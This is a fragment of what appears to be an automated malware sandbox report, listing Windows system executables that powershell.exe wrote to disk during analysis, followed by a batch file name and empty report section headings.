The process powershell.exe wrote an executable file to disk (20 events)

file	C:\Windows\System32\ie4uinit.exe
file	C:\Program Files\Windows Sidebar\sidebar.exe
file	C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file	C:\Windows\System32\xpsrchvw.exe
file	C:\Windows\System32\displayswitch.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file	C:\Windows\System32\mblctr.exe
file	C:\Windows\System32\mstsc.exe
file	C:\Windows\System32\SnippingTool.exe
file	C:\Windows\System32\SoundRecorder.exe
file	C:\Windows\System32\dfrgui.exe
file	C:\Windows\System32\msinfo32.exe
file	C:\Windows\System32\rstrui.exe
file	C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file	C:\Program Files\Windows Journal\Journal.exe
file	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file	C:\Windows\System32\MdSched.exe
file	C:\Windows\System32\msconfig.exe
file	C:\Windows\System32\recdisc.exe
file	C:\Windows\System32\msra.exe

sch.bat

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All